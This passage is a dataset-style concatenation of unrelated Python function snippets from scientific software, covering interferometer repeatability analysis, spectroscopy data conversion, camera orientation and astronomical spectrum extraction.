TriangleHumps.get_dimensions(x,debug_groups=groups,debug_diffs=diff_traces,debug_markers = markers, im = im,y3=y3)\n mode = stats.mode(y3)[0][0]\n trigger = mode*2+1\n t3 = Scatter(y=y3)\n\n annotations = []\n diff_traces = [Scatter(y=v) for v in diff_traces]\n t4 = Scatter(x=markers,y=[10]*len(markers),mode = 'markers+text')\n for gru in groups:\n for hump in gru:\n annotations.append({\n 'x':hump['range'][0],\n 'y':trigger,\n 'text':'%d,%d'%(hump['area'],hump['length']),\n })\n\n name = 'mode=%d,trigger=%d,groups=%d' % (mode,trigger,len(groups))\n \n #return (t1,t2,t3,)\n #print('markers %d:' % x['id'],markers,[trigger]*len(markers))\n return [t3,t4,] + diff_traces,annotations, name", "def investigate4DRepeatability():\n parentdir = '/home/rallured/Dropbox/Interferometer/SolarBFlat/Repeatability/'\n avgs = [1,2,4,8,16,32]\n\n #Temporal with fringes tilted\n fn = glob.glob(parentdir+'Tilt/17*RepeatabilityTiltTemporal*.bin')\n fn.sort()\n dx = met.readFlatScript(fn[0].split('.')[0])[1]\n d = np.array([met.readFlatScript(fi.split('.')[0])[0] for fi in fn])\n #Make progressive averaging plot\n plt.figure('TemporalTiltedFigure')\n for i in np.arange(6)*2:\n f,p = fourier.meanPSD(d[i],win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label=str(avgs[i/2]))\n plt.legend(loc='lower left')\n plt.title('Solar B PSD - Temporal,Tilted')\n plt.xlabel('Frequency (1/mm)')\n plt.ylabel('Power ($\\mu$m$^2$ mm)')\n plt.grid()\n #Get repeatability\n reptemptilt = d[-1]-d[-2]\n figtemptilt = d[-1]\n\n #Dynamic with fringes tilted\n fn = glob.glob(parentdir+'Tilt/17*RepeatabilityTilt_*.bin')\n fn.sort()\n dx = met.readFlatScript(fn[0].split('.')[0])[1]\n d = [met.readFlatScript(fi.split('.')[0])[0] for fi in fn]\n #Make progressive averaging plot\n plt.figure('DynamicTiltedFigure')\n for i in np.arange(6)*2:\n f,p = fourier.meanPSD(d[i],win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label=str(avgs[i/2]))\n plt.legend(loc='lower left')\n plt.title('Solar B PSD - Dynamic,Tilted')\n plt.xlabel('Frequency (1/mm)')\n plt.ylabel('Power ($\\mu$m$^2$ mm)')\n plt.grid()\n #Get repeatability\n repdyntilt = d[-1]-d[-2]\n figdyntilt = d[-1]\n \n #Temporal with fringes nulled\n fn = glob.glob(parentdir+'Nulled/17*.bin')\n fn.sort()\n dx = met.readFlatScript(fn[0].split('.')[0])[1]\n d = np.array([met.readFlatScript(fi.split('.')[0])[0] for fi in fn])\n #Make progressive averaging plot\n plt.figure('TemporalNulledFigure')\n for i in np.arange(6)*2:\n f,p = fourier.meanPSD(d[i],win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label=str(avgs[i/2]))\n plt.legend(loc='lower left')\n plt.title('Solar B PSD - Temporal,Nulled')\n plt.xlabel('Frequency (1/mm)')\n plt.ylabel('Power ($\\mu$m$^2$ mm)')\n plt.grid()\n #Get repeatability\n reptempnull = d[-1]-d[-2]\n figtempnull = d[-1]\n \n #Dynamic with fringes nulled\n d = pyfits.getdata('/home/rallured/Dropbox/Interferometer/'\n 'SolarBFlat/Repeatability/'\n 'Nulled/170103_Processed.fits')\n rep = np.array([d[i,0]-d[i,1] for i in range(32)])\n #Make progressive averaging plot\n plt.figure('DynamicNulledFigure')\n for i in [0,1,3,7,15,31]:\n f,p = fourier.meanPSD(d[i,0],win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label=str(i+1))\n plt.legend(loc='lower left')\n plt.title('Solar B PSD - Dynamic,Nulled')\n plt.xlabel('Frequency (1/mm)')\n plt.ylabel('Power ($\\mu$m$^2$ mm)')\n plt.grid()\n #Get repeatability\n repdynnull = d[-1][0]-d[-1][1]\n figdynnull = d[-1][0]\n\n #Make comparative repeatability plots with 32 averages\n plt.figure('CompareRepeatability')\n f,p = fourier.meanPSD(repdynnull,win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label='Dynamic,Nulled')\n f,p = fourier.meanPSD(repdyntilt,win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label='Dynamic,Tilted')\n f,p = fourier.meanPSD(reptemptilt,win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label='Temporal,Tilted')\n f,p = fourier.meanPSD(reptempnull,win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label='Temporal,Nulled')\n plt.legend(loc='lower left')\n plt.title('Solar B Repeatability - 32 Averages')\n plt.xlabel('Frequency (1/mm)')\n plt.ylabel('Power ($\\mu$m$^2$ mm)')\n plt.grid()\n\n #Make comparative figure plots with 32 averages\n plt.figure('CompareFigure')\n f,p = fourier.meanPSD(figdynnull,win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label='Dynamic,Nulled')\n f,p = fourier.meanPSD(figdyntilt,win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label='Dynamic,Tilted')\n f,p = fourier.meanPSD(figtemptilt,win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label='Temporal,Tilted')\n f,p = fourier.meanPSD(figtempnull,win=np.hanning,dx=dx,irregular=True,\\\n minpx=200)\n plt.loglog(f,p/f[0],label='Temporal,Nulled')\n plt.legend(loc='lower left')\n plt.title('Solar B Figure - 32 Averages')\n plt.xlabel('Frequency (1/mm)')\n plt.ylabel('Power ($\\mu$m$^2$ mm)')\n plt.grid()\n\n #Make parroting repeatability plots\n fig = plt.figure('Parroting')\n fig.add_subplot(2,2,1)\n plt.imshow(repdyntilt)\n plt.title('Dynamic Repeatability')\n plt.colorbar()\n fig.add_subplot(2,2,2)\n plt.imshow(reptemptilt)\n plt.title('Temporal Repeatability')\n plt.colorbar()\n fig.add_subplot(2,2,3)\n res = legendre2d(repdyntilt,xo=3,yo=3)[0]\n plt.imshow(repdyntilt-res)\n plt.title('Dynamic Repeatability Filtered')\n plt.colorbar()\n fig.add_subplot(2,2,4)\n res = legendre2d(reptemptilt,xo=3,yo=3)[0]\n plt.imshow(reptemptilt-res)\n plt.title('Temporal Repeatability Filtered')\n plt.colorbar()", "def _get_dc_offset(self):\n # apply this knowledge to reshape the spectroscopic values\n # remember to reshape such that the dimensions are arranged in reverse order (slow to fast)\n spec_vals_nd, success = reshape_to_n_dims(self._sho_spec_vals[self._sho_all_but_forc_inds,\n self._current_sho_spec_slice],\n h5_spec=self._sho_spec_inds[self._sho_all_but_forc_inds,\n self._current_sho_spec_slice])\n # This should result in a N+1 dimensional matrix where the first index contains the actual data\n # the other dimensions are present to easily slice the data\n spec_labels_sorted = np.hstack(('Dim', self.h5_main.spec_dim_labels))\n if self._verbose:\n print('Spectroscopic dimensions sorted by rate of change:')\n print(spec_labels_sorted)\n # slice the N dimensional dataset such that we only get the DC offset for default values of other dims\n fit_dim_pos = np.argwhere(spec_labels_sorted == self._fit_dim_name)[0][0]\n # fit_dim_slice = list()\n # for dim_ind in range(spec_labels_sorted.size):\n # if dim_ind == fit_dim_pos:\n # fit_dim_slice.append(slice(None))\n # else:\n # fit_dim_slice.append(slice(0, 1))\n\n fit_dim_slice = [fit_dim_pos]\n for idim, dim in enumerate(spec_labels_sorted[1:]):\n if dim == self._fit_dim_name:\n fit_dim_slice.append(slice(None))\n fit_dim_slice[0] = idim\n elif dim in ['FORC', 'FORC_repeat', 'FORC_Cycle']:\n continue\n else:\n fit_dim_slice.append(slice(0, 1))\n\n if self._verbose:\n print('slice to extract Vdc:')\n print(fit_dim_slice)\n\n self.fit_dim_vec = np.squeeze(spec_vals_nd[tuple(fit_dim_slice)])\n\n return", "def odemis_to_hyperspy(filename='sampledata/cltest.h5',specbin=1) :\r\n\r\n f=h5.File(filename,'r')\r\n shome = 'Acquisition2//ImageData/'\r\n x = f[shome + 'Image']\r\n cdesc =f['Acquisition2/PhysicalData/ChannelDescription'].value[0].decode('utf-8')\r\n #print(cdesc)\r\n\r\n cltype = None\r\n if 'Spectrum' in cdesc :\r\n cltype = 'spectrum'\r\n elif 'CL intensity' in cdesc:\r\n cltype = 'panchrom'\r\n\r\n print('<' + filename + '> original shape :' ,x.shape, cltype)\r\n\r\n # strip unused dimensions and transpose/ reverse index order\r\n if cltype == 'panchrom' :\r\n xx=x[0,0,0,:,:].transpose((1,0))\r\n # just an image..\r\n else :\r\n xx=x[:,0,0,:,:].transpose((2,1,0))\r\n\r\n if cltype == 'spectrum' :\r\n #interpolate data to linearize the wavelength scale\r\n w = f[shome + 'DimensionScaleC'].value *1e9\r\n wx = np.linspace(w.min(),w.max(),w.size)\r\n for i in np.arange(xx.shape[0]) :\r\n for k in np.arange(xx.shape[1]) :\r\n xx[i,k,:] = np.interp(wx,w,xx[i,k,:])\r\n\r\n wslope = wx[1]-wx[0]\r\n woffset = wx.min()\r\n #wx = np.arange(w.size)\r\n #wslope,woffset=np.polyfit(wx,w,1)\r\n s = hs.signals.Signal1D(xx)\r\n\r\n elif cltype == 'panchrom' :\r\n s = hs.signals.Signal2D(xx)\r\n else :\r\n print('unknown type')\r\n\r\n print('hyperspy shape :' ,s.data.shape)\r\n\r\n\r\n s.metadata.General.title = 'Odemis: ' + cdesc\r\n s.metadata.General.original_filename = filename\r\n s.metadata.General.notes = cltype\r\n s.axes_manager[0].name = 'pos x'\r\n s.axes_manager[0].scale = f[shome + 'DimensionScaleX'].value * 1e6\r\n s.axes_manager[0].offset = f[shome + 'XOffset'].value * 1e6\r\n s.axes_manager[0].units = 'um'\r\n\r\n\r\n s.axes_manager[1].name = 'pos y'\r\n s.axes_manager[1].scale = f[shome + 'DimensionScaleX'].value * 1e6\r\n s.axes_manager[1].offset = f[shome + 'YOffset'].value * 1e6\r\n s.axes_manager[1].units = 'um'\r\n\r\n if cltype == 'spectrum' :\r\n s.axes_manager[2].name = 'wavelength'\r\n s.axes_manager[2].units = 'nm'\r\n s.axes_manager[2].offset = woffset\r\n s.axes_manager[2].scale = wslope\r\n s.metadata.signal_type = 'CL'\r\n\r\n f.close()\r\n if (specbin > 1) and (cltype == 'spectrum'):\r\n return( s.rebin(scale=[1,1,specbin]) )\r\n else :\r\n return( s )\r\n #end odemis_to_hyperspy\r\n #######################\r", "def readShimadzuSection(section):\n xdata = []\n ydata = []\n for line in section:\n tt = line.split()\n if len(tt)==2:\n try:\n x=float(tt[0])\n except ValueError:\n continue\n try:\n y=float(tt[1])\n except ValueError:\n continue\n xdata.append(x)\n ydata.append(y)\n return xdata,ydata", "def raw_orient(\n cal: Calibration,\n cpar: ControlPar,\n nfix: int,\n fix: List[np.ndarray],\n pix: List[Target],\n) -> bool:\n X = np.zeros((10, 6))\n y = np.zeros((10,))\n XPX = np.zeros((6, 6))\n XPy = np.zeros((6,))\n beta = np.zeros((6,))\n itnum = 0\n stopflag = False\n dm = 0.0001\n drad = 0.0001\n cal.added_par.k1 = 0\n cal.added_par.k2 = 0\n cal.added_par.k3 = 0\n cal.added_par.p1 = 0\n cal.added_par.p2 = 0\n cal.added_par.scx = 1\n cal.added_par.she = 0\n\n while not stopflag and itnum < 20:\n itnum += 1\n\n n = 0\n for i in range(nfix):\n xc, yc = pixel_to_metric(pix[i].x, pix[i].y, cpar)\n\n pos = vec_set(fix[i][0], fix[i][1], fix[i][2])\n cal.ext_par.update_rotation_matrix()\n xp, yp = img_coord(pos, cal, cpar.mm)\n\n X[n], X[n + 1] = num_deriv_exterior(cal, cpar, dm, drad, pos)\n y[n], y[n + 1] = xc - xp, yc - yp\n\n n += 2\n\n # void ata (double *a, double *ata, int m, int n, int n_large )\n ata(X, XPX, n, 6, 6)\n if np.any(XPX):\n XPXi = np.linalg.inv(XPX)\n else:\n XPXi = XPX\n\n # atl (double *u, double *a, double *l, int m, int n, int n_large)\n XPy = atl(XPy, X, y, 6)\n beta = XPXi @ XPy\n\n # ata ((double *) X, (double *) XPX, n, 6, 6);\n # matinv ((double *) XPX, 6, 6);\n # atl ((double *) XPy, (double *) X, y, n, 6, 6);\n # matmul ((double *) beta, (double *) XPX, (double *) XPy, 6,6,1,6,6);\n\n stopflag = all(abs(beta) <= 0.1)\n\n cal.ext_par.x0 += beta[0]\n cal.ext_par.y0 += beta[1]\n cal.ext_par.z0 += beta[2]\n cal.ext_par.omega += beta[3]\n cal.ext_par.phi += beta[4]\n cal.ext_par.kappa += beta[5]\n\n if stopflag:\n cal.ext_par.rotation_matrix()\n\n return stopflag", "def CALSPECAbsLineIdentificationinPDF(spectra,pointing,all_titles,object_name,dir_top_images,all_filt,date,figname,tagname,NBIMGPERROW=2):\n \n \n NBSPEC=len(spectra)\n \n MAXIMGROW=max(2,int(m.ceil(float(NBSPEC)/float(NBIMGPERROW))))\n \n \n # fig file specif\n NBIMGROWPERPAGE=5 # number of rows per pages\n PageNum=0 # page counter\n \n figfilename=os.path.join(dir_top_images,figname)\n \n pp = PdfPages(figfilename) # create a pdf file\n \n \n titlepage='WL calibrated 1D Spectra 1D for obj : {} date :{}'.format(object_name,date)\n \n \n all_wl= [] # containers for wavelength\n \n \n for index in np.arange(0,NBSPEC):\n \n \n # new pdf page \n if index%(NBIMGPERROW*NBIMGROWPERPAGE) == 0:\n f, axarr = plt.subplots(NBIMGROWPERPAGE,NBIMGPERROW,figsize=(25,30))\n f.suptitle(titlepage,size=20)\n \n # index of image in the pdf page \n indexcut=index-PageNum*(NBIMGROWPERPAGE*NBIMGPERROW) \n ix=indexcut%NBIMGPERROW\n iy=indexcut/NBIMGPERROW\n \n \n spec = spectra[index]\n \n # calibrate\n grating_name=get_disperser_filtname(all_filt[index])\n X_Size_Pixels=np.arange(spec.shape[0])\n lambdas = Pixel_To_Lambdas(grating_name,X_Size_Pixels,pointing[index],False)\n \n \n all_wl.append(lambdas)\n \n #plot\n axarr[iy,ix].plot(lambdas,spec,'r-',lw=2,label=tagname)\n \n thetitle=\"{} : {} : {} \".format(index,all_titles[index],all_filt[index])\n axarr[iy,ix].set_title(thetitle,color='blue',fontweight='bold',fontsize=16)\n \n \n #axarr[iy,ix].text(600.,spec.max()*1.1, all_filt[index],verticalalignment='top', horizontalalignment='left',color='blue',fontweight='bold', fontsize=20)\n axarr[iy,ix].legend(loc='best',fontsize=16)\n axarr[iy,ix].set_xlabel('Wavelength [nm]', fontsize=16)\n axarr[iy,ix].grid(True)\n \n YMIN=0.\n YMAX=spec.max()*1.2\n \n for line in LINES:\n if line == O2 or line == HALPHA or line == HBETA or line == HGAMMA or line == HDELTA or line ==O2B or line == O2Y or line == O2Z:\n axarr[iy,ix].plot([line['lambda'],line['lambda']],[YMIN,YMAX],'-',color='red',lw=0.5)\n axarr[iy,ix].text(line['lambda'],0.9*(YMAX-YMIN),line['label'],verticalalignment='bottom', horizontalalignment='center',color='red', fontweight='bold',fontsize=16)\n \n \n axarr[iy,ix].set_ylim(YMIN,YMAX)\n axarr[iy,ix].set_xlim(np.min(lambdas),np.max(lambdas))\n axarr[iy,ix].set_xlim(0,1200.)\n \n if (index+1)%(NBIMGPERROW*NBIMGROWPERPAGE) == 0:\n PageNum+=1 # increase page Number\n f.savefig(pp, format='pdf')\n f.show()\n \n \n f.savefig(pp, format='pdf') \n f.show()\n pp.close() \n \n return all_wl", "def front_wheel_from_axis():", "def calib2sections(dirname):\n\n if os.path.isfile(dirname):\n return v2calib2sections(dirname)\n\n # Get centres of the sections, and apply corrections.\n s_cen = calib2tensor3(dirname, \"center\") \\\n + calib2tensor3(dirname, \"center_corr\")\n\n # Get the rotation of sections, and apply corrections. Note that\n # sections 0, 1 and 4, 5 are antiparallel!\n s_rot = calib2tensor3(dirname, \"rotation\") \\\n + calib2tensor3(dirname, \"tilt\")\n\n # Get the margin, gap, and shift adjustments of the sections within\n # each quadrant.\n s_mgs = calib2tensor3(dirname, \"marg_gap_shift\")\n\n # Get offsets of the quadrants, and apply corrections.\n q_off = calib2tensor3(dirname, \"offset\") \\\n + calib2tensor3(dirname, \"offset_corr\")\n\n # Get rotation of the quadrants, and apply corrections.\n q_rot = calib2tensor3(dirname, \"quad_rotation\") \\\n + calib2tensor3(dirname, \"quad_tilt\")\n\n # The third coordinate is ignored for now, even though optical\n # measurement gives a variation in Z up to 0.6 mm.\n sections = []\n for q in range(s_cen.shape[0]):\n sections.append([])\n for s in range(s_cen.shape[1]):\n sec = Section()\n sec.translate((s_mgs[0, 0] + s_cen[q, s, 0],\n s_mgs[1, 0] + s_cen[q, s, 1]))\n sec.srotate(s_rot[q, s])\n sec.qrotate(q_rot[q])\n sec.translate((s_mgs[0, 1] + q_off[0, q],\n s_mgs[1, 1] + q_off[1, q]))\n\n # XXX I still don't understand this bit!\n if (q == 0):\n sec.translate((-s_mgs[0, 2] + s_mgs[0, 3],\n -s_mgs[1, 2] - s_mgs[1, 3]))\n elif (q == 1):\n sec.translate((-s_mgs[0, 2] - s_mgs[0, 3],\n +s_mgs[1, 2] - s_mgs[1, 3]))\n elif (q == 2):\n sec.translate((+s_mgs[0, 2] - s_mgs[0, 3],\n +s_mgs[1, 2] + s_mgs[1, 3]))\n elif (q == 3):\n sec.translate((+s_mgs[0, 2] + s_mgs[0, 3],\n -s_mgs[1, 2] + s_mgs[1, 3]))\n\n sections[q].append(sec)\n return (sections)", "def ED(X,Y):", "def get_index_from_well(self, well):\n pass", "def extract_kernel(spec_ds,x,y,width,height,band,transform):\r\n # Modified original code from Zhiqiang Yang (read_spectral) at Oregon State University\r\n xoffset = int(x - transform[0])/30 - width/2\r\n yoffset = int(y - transform[3])/-30 - height/2\r\n\r\n # plot is outside the image boundary\r\n if xoffset <0 or yoffset > spec_ds.RasterYSize - 1:\r\n return [-9999]\r\n this_band = spec_ds.GetRasterBand(band)\r\n specs = this_band.ReadAsArray(xoffset, yoffset, width, height)\r\n return specs", "def _get_orientations(self):\n for atom in self.invarioms:\n atom.get_orientation()", "def test_get_dim_index_with_label(self):\n\n dim = self.oecd_datasets['oecd']['dimension']['id'][0]\n dims_df = pyjstat.get_dim_index(self.oecd_datasets['oecd'], dim)\n self.assertTrue(dims_df.iloc[0]['id'] == 'UNR')\n self.assertTrue(dims_df.iloc[-1]['index'] == 0)", "def _output_axes(self, in_obj, pad_int):\n output_axes = ng.make_axes()\n for ax in in_obj.axes:\n name = ax.name\n if name in self.conv_axis_names:\n output_axes += ng.make_axis(name=ax.name,\n length=utils.conv_output_dim(\n ax.length,\n self.filter_spatial_shape[name],\n pad_int[name],\n self.strides[name],\n False,\n self.dilation[name]))\n elif name == \"C\":\n output_axes += ng.make_axis(name=name, length=self.nout)\n else:\n output_axes += ax\n return output_axes", "def ActiveHlt1Lines(self) :\n lines = ['Hlt1IncPhi','Hlt1CalibTracking']\n\n return lines", "def _get_out_segments(self):\n return self.__out_segments", "def consecutive_sections(): # noqa: D416", "def split_axis(input_shape):\n d = input_shape[-1]\n split_axis = [70] * (d // 70)\n if d % 70 > 0:\n split_axis.append(int(d % 70))\n return split_axis", "def get_axis(header, axis):\n \n logger = logging.getLogger(__name__)\n \n logger.debug(\"Will extract axis: {}.\".format(axis))\n \n wcs = WCS(header)\n\n wcs_arr_shape = wcs.array_shape\n logger.debug(\"WCS array shape: {}\".format(wcs_arr_shape))\n n_axis = wcs.array_shape[-axis]\n logger.debug(\"Axis should have {} elements.\".format(n_axis))\n if len(wcs_arr_shape) > 3:\n axis_vals = wcs.pixel_to_world_values(np.c_[np.zeros(n_axis), np.zeros(n_axis), np.arange(0,n_axis), np.zeros(n_axis)])\n else:\n axis_vals = wcs.pixel_to_world_values(np.c_[np.zeros(n_axis), np.zeros(n_axis), np.arange(0,n_axis)])\n\n axis_vals = np.asarray(axis_vals)\n axis_vals = axis_vals[:,axis-1]\n \n return axis_vals", "def orient_img_hwd(data, slice_axis):\n if slice_axis == 0:\n return data.transpose(2, 1, 0)\n elif slice_axis == 1:\n return data.transpose(2, 0, 1)\n elif slice_axis == 2:\n return data", "def display(self,anchor_name = ANCHOR_NAME ,mode = '2D'):\n res = self.read_mes()\n \n \n \n \n ref_points = res[0]\n positions = res[1]\n \n \n \n # print(ref_points)\n # print(rangings)\n out = [] # will be returned\n measured_positions = [] # measured ranging value for the reference point\n real_positions = [] # real ranging value for the reference point\n \n #abs_standard_deviation = []\n #relative_standard_deviation = []\n \n abs_accuracies = []\n #relative_accuracies = []\n \n #angles = angle(ref_points,anchor_name)\n \n for (i,rp) in enumerate(ref_points):\n serie = positions[i]\n \n (real_position,mean_position,mean_accuracy) = self.extract_serie(serie,rp)\n \n # getting error for anchor A\n #print(get_ranging_error('A',mean_position,rp) )\n measured_positions.append(mean_position)\n real_positions.append(real_position)\n abs_accuracies.append(mean_accuracy)\n \n global_accuracy = np.mean(abs_accuracies)\n print(\"average accuracy :\" + str(global_accuracy) )\n \n \n \n \n # displaying averaged values\n \n \n \n \n \n \n measured_x = []\n measured_y = []\n measured_z = []\n real_x = []\n real_y = []\n real_z = []\n for pos in measured_positions:\n (x,y,z) = pos\n measured_x.append(x)\n measured_y.append(y)\n measured_z.append(z)\n \n for pos in real_positions:\n (x,y,z) = pos\n real_x.append(x)\n real_y.append(y)\n real_z.append(z)\n \n \n \n \n \n \n \n if (mode == '2D'):\n \n \n \n # plotting results\n \n # creating figures \n fig1 = plt.figure(\"Accuracy\")\n fig2 = plt.figure(\"Positions\") \n \n # creating axes \n ax1 = fig1.add_subplot(111,projection='3d')\n ax1.view_init(elev = 45, azim = 240)\n ax1.set_title(\"absolute accuracy\")\n ax1.plot(real_x[:],real_y[:],abs_accuracies[:])\n \n \n \n \n \n ax2 = fig2.add_subplot(111)\n ax2.set_title(\"Real positions\")\n ax2.scatter(real_x[:],real_y[:])\n \n ax2 = fig2.add_subplot(111)\n ax2.set_title(\"Measured positions\")\n ax2.scatter(measured_x[:],measured_y[:])\n \n \n \n \n \n \n \n if (mode == '3D'):\n # plotting results\n \n # creating figures \n fig1 = plt.figure(\"Accuracy\")\n fig2 = plt.figure(\"Positions\") \n \n # creating axes \n ax1 = fig1.add_subplot(111,projection='3d')\n ax1.view_init(elev = 45, azim = 240)\n ax1.set_title(\"absolute accuracy\")\n ax1.plot(real_x[:],real_y[:],abs_accuracies[:])\n \n \n \n \n \n ax2 = fig2.add_subplot(111,projection='3d')\n ax2.view_init(elev = 45, azim = 240)\n ax2.set_title(\"Real positions\")\n ax2.scatter(real_x[:],real_y[:],real_z[:])\n \n ax2 = fig2.add_subplot(111,projection='3d')\n ax2.view_init(elev = 45, azim = 240)\n ax2.set_title(\"Measured positions\")\n ax2.scatter(measured_x[:],measured_y[:],measured_z[:])\n \n \n \n if (DISPLAY): \n plt.show()\n \n \n return(out)", "def _secondary_beam(self, hdr):\n # Called ApSecondaryNano in OpenMIMS\n d = {}\n tmp = unpack(self._bo + 'd 42i 2d', hdr.read(192))\n d['E0W'], d['ES'] = tmp[:2]\n d['ES widths'] = tmp[2:12]\n d['ES heights'] = tuple(tmp[12:22])\n d['AS'] = tmp[22]\n d['AS widths'] = tuple(tmp[23:33])\n d['AS heights'] = tuple(tmp[33:43])\n d['EnS'], d['EnS width'] = tmp[43:]\n return d", "def test_find_dispersion_axis():\n wavelengths = np.arange(100) * 0.1 + np.exp(0.1) * 13.0\n # [14.36722193, 14.46722193, 14.56722193, ... 24.16722193, 24.26722193]\n\n wavelengths_horizontal = np.tile(wavelengths, 15).reshape(15, 100)\n assert find_dispersion_axis(wavelengths_horizontal) == 0\n\n wavelengths_vertical = np.repeat(wavelengths, 15).reshape(100, 15)\n assert find_dispersion_axis(wavelengths_vertical) == 1\n\n # Make sure it works for decreasing wavelengths\n assert find_dispersion_axis(np.fliplr(wavelengths_horizontal)) == 0\n assert find_dispersion_axis(np.flipud(wavelengths_vertical)) == 1\n\n # Make sure it works if there are NaNs\n wavelengths_horizontal[:,0] = np.nan\n assert find_dispersion_axis(wavelengths_horizontal) == 0\n\n wavelengths_vertical[:,0] = np.nan\n assert find_dispersion_axis(wavelengths_vertical) == 1\n\n # Make sure if wavelengths don't change it produces an error\n wavelengths_zeros = np.zeros((15, 100))\n with pytest.raises(RuntimeError):\n find_dispersion_axis(wavelengths_zeros)", "def extract_spec(data, region, naxis, mode):\n \n logger = logging.getLogger(__name__)\n \n logger.debug('Data shape: {0}'.format(data.shape))\n \n if region['shape'] == 'point':\n if naxis > 3:\n spec = data[:,:,region['params']['cy'],region['params']['cx']]\n if mode == 'sum':\n spec = spec.sum(axis=0)\n elif mode == 'avg':\n spec = spec.mean(axis=0)\n elif 'flux' in mode.lower():\n spec = spec.sum(axis=0)/region['barea']\n else:\n logger.error('Mode not supported.')\n logger.error('Will exit now.')\n sys.exit(1)\n elif naxis == 3:\n spec = data[:,region['params']['cy'],region['params']['cx']]\n else:\n spec = data[region['params']['cy'],region['params']['cx']]\n \n elif region['shape'] == 'box':\n area = (region['params']['trcy'] - region['params']['blcy']) * \\\n (region['params']['trcx'] - region['params']['blcx'])\n \n if naxis > 3:\n spec = data[0,:,region['params']['blcy']:region['params']['trcy'],\n region['params']['blcx']:region['params']['trcx']]\n \n if mode == 'sum':\n spec = spec.sum(axis=2).sum(axis=1)\n elif mode == 'avg':\n spec = spec.mean(axis=2).mean(axis=1)\n elif 'flux' in mode.lower():\n spec = spec.sum(axis=2).sum(axis=1)/region['barea']\n else:\n logger.error('Mode not supported.')\n logger.error('Will exit now.')\n sys.exit(1)\n \n elif naxis == 3:\n spec = data[:,region['params']['blcy']:region['params']['trcy'],\n region['params']['blcx']:region['params']['trcx']]\n if mode == 'sum':\n spec = spec.sum(axis=2).sum(axis=1)#/area\n elif mode == 'avg':\n spec = spec.mean(axis=2).mean(axis=1)#/area\n elif 'flux' in mode.lower():\n summ = spec.sum(axis=2).sum(axis=1)\n logger.info('Sum of pixels: {0}'.format(summ))\n spec = summ/region['barea']\n else:\n logger.error('Mode not supported.')\n logger.error('Will exit now.')\n sys.exit(1)\n \n else:\n spec = data[region['params']['blcy']:region['params']['trcy'],\n region['params']['blcx']:region['params']['trcx']]\n if mode == 'sum':\n spec = spec.sum()\n elif mode == 'avg':\n spec = spec.mean()\n elif 'flux' in mode.lower():\n spec = spec.sum()/region['barea']\n else:\n logger.error('Mode not supported.')\n logger.error('Will exit now.')\n sys.exit(1)\n \n elif region['shape'] == 'circle':\n logger.info(\"Circular region has a center \" \\\n \"at pixel ({0},{1}) with radius \" \\\n \"{2}\".format(region['params']['cx'], \n region['params']['cy'], \n region['params']['r']))\n \n if naxis > 3:\n logger.debug(\"The image has more than 3 axes.\")\n mask = sector_mask(data[0,0].shape,\n (region['params']['cy'], region['params']['cx']),\n region['params']['r'],\n (0, 360))\n mdata = data[0][:,mask]\n logger.debug(\"Masked data shape: {0}\".format(mdata.shape))\n if 'sum' in mode.lower():\n spec = mdata.sum(axis=1)\n elif 'avg' in mode.lower():\n spec = mdata.mean(axis=1)\n elif 'flux' in mode.lower():\n spec = mdata.sum(axis=1)/region['barea']\n \n elif naxis == 3:\n \n mask = sector_mask(data[0].shape,\n (region['params']['cy'], region['params']['cx']),\n region['params']['r'],\n (0, 360))\n mdata = data[:,mask]\n logger.debug(\"Masked data shape: {0}\".format(mdata.shape))\n if 'sum' in mode.lower():\n spec = mdata.sum(axis=1)#/len(np.where(mask.flatten() == 1)[0])\n elif 'avg' in mode.lower():\n spec = mdata.mean(axis=1)\n elif 'flux' in mode.lower():\n spec = mdata.sum(axis=1)/region['barea']\n else:\n logger.error('Mode not supported.')\n logger.error('Will exit now.')\n sys.exit(1)\n \n else:\n \n mask = sector_mask(data.shape,\n (region['params']['cy'], region['params']['cx']),\n region['params']['r'],\n (0, 360))\n mdata = np.ma.masked_invalid(data[mask])\n logger.debug(\"Masked data shape: {0}\".format(mdata.shape))\n logger.debug(\"Masked data sum: {0}\".format(mdata))\n if 'sum' in mode.lower():\n spec = mdata.sum()#/len(np.where(mask.flatten() == 1)[0])\n elif 'avg' in mode.lower():\n spec = mdata.mean()\n elif 'flux' in mode.lower():\n spec = mdata.sum()/region['barea']\n else:\n logger.error('Mode not supported.')\n logger.error('Will exit now.')\n sys.exit(1)\n \n elif region['shape'] == 'ellipse':\n logger.info(\"Elliptical region has a center \" \\\n \"at pixel ({0},{1}) with major and minor axes \" \\\n \"{2} and {3} at an angle {4}\".format(region['params']['cx'], \n region['params']['cy'], \n region['params']['bmaj'],\n region['params']['bmin'],\n region['params']['theta']))\n \n logger.debug(\"Mask shape: {}\".format(data.shape[-2:]))\n mask = ellipse_mask(data.shape[-2:],\n region['params']['cy'], region['params']['cx'],\n region['params']['bmaj']/2., region['params']['bmin']/2.,\n region['params']['theta'])\n logger.debug('Elements in mask: {}'.format(mask.sum()))\n \n if naxis > 3:\n mdata = data[0][:,mask]\n axis = 1\n elif naxis == 3:\n mdata = data[:,mask]\n axis = 1\n else:\n mdata = data[mask]\n axis = 0\n logger.debug(\"Masked data shape: {0}\".format(mdata.shape))\n \n if 'sum' in mode.lower():\n spec = mdata.sum(axis=axis)\n elif 'avg' in mode.lower():\n spec = mdata.mean(axis=axis)\n elif 'flux' in mode.lower():\n spec = mdata.sum(axis=axis)/region['barea']\n else:\n logger.error('Mode not supported.')\n logger.error('Will exit now.')\n sys.exit(1)\n \n elif 'poly' in region['shape']:\n npolys = len(region['params']['Polygons'])\n \n if naxis > 3:\n shape = data[0][0].shape\n npix3 = data[0].shape[0]\n elif naxis == 3:\n shape = data[0].shape\n npix3 = data.shape[0]\n else:\n shape = 